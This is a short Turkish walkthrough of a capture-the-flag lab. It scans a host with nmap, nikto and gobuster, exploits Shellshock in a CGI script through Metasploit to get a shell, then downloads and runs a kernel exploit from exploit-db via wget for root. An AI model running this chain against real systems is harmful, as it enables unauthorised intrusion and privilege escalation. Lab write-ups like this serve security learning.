Size, burada kolay ve kısa yolunu göstereceğim.
USER.TXT:
Keşif
önce nmap taraması yapıyoruz
nmap -sC -sV <host>
— — — — — — — —
daha sonra nikto ile web açık taraması yapıyoruz
nikto -h <host>
shellshock açığı olduğu görülür
__________________
gobuster dir -u http://<host>/cgi-bin -w /usr/share/wordlists/common.txt -x cgi yazarak siteyi tarıyoruz ve test.cgi’yi elde ediyoruz
Remote/Erişim
msfconsole yazarak metasploit framework’ü açıyoruz
daha sonra search shellshock yazarak exploitleri aratıyoruz
exploit/multi/http/apache_mod_cgi_bash_env_exec ‘i seçerek ayarları show options yapıp görüntüledikten sonra rhost, lhost ne varsa kendi hostlarınızı girin. Ardından TARGETURI’yı /cgi-bin/test.cgi girin
ardından exploit yazarak sistemi ele geçirin
shell komutunu kullanıp shell’e bağlanın
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ komutuyla etkileşimli shell’e geçiyoruz
cd /home/ryan dizinine girip user flag’i alabilirsiniz :) (cat user.txt)
ROOT.TXT:
privesc
uname -a yazarak sürümü öğrendik ve exploit-db’den exploit arattık ve 37293 numaralı exploite ulaştık, indirip gcc ile execute ettik
python3 -m http.server yazdık ve wget komutuyla indirttik exploitimizi
daha sonra chmod 777 yetkisini veriyoruz dosyaya
./<exploit-dosyan> yazıp çalıştırıyoruz ve root oluyoruz
cd /root yazıp erişebilirsiniz root flag’e